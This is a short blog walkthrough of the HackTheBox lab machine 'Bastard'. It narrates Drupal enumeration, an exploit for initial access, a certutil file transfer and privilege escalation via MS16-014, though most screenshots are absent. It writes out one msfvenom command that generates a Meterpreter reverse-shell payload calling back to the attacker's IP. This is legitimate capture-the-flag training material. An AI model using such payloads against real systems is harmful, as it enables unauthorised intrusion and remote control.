HacktheBox Bastard Walkthrough

    The other day, a friend asked if I was on HacktheBox and I was reminded that I'd been absent for a while.  Apparently, they are cranking out a new box every week which could be good or bad -- I'm not really sure.  While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.  

    This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system.  From there, it was trial and error as to which technique would work for a particular task.  After that, root was easy.

    First, we kick off with Nmap:





    Right off the bat, we see that we're running Windows / IIS and we're running Drupal. 

    We check out the Drupal site:





    We get the Drupal version:





    We run Droopescan:





    We search through Searchsploit:





    We find a vulnerability in Services with an exploit which does not work.  I tried troubleshooting the issue but no such luck.  I then go hunting the web and I find:





    Let's see if we can get a simple "whoami":





    Excellent! 


    Next, let's check out the architecture:





    We need a reverse shell:

    msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=10.10.14.4 LPORT=443 -f exe >> mshell443.exe





    I realize I have a shell with that name and I rename my shell to bastard.exe

    After some trial and error with downloading the file, certutil proves to be the winner.  

    We move the shell to our victim:





    We check the directory as a sanity check.  I should also point out that I created that directory earlier. 

    We execute our shell:





    With our handler setup:





    We catch the inbound connection:





    We move to Exploit Suggester:





    For some reason, ms16-075 does not work.  I move to ms16-014:





    And... we're root!  


    © 2020 sevenlayers.com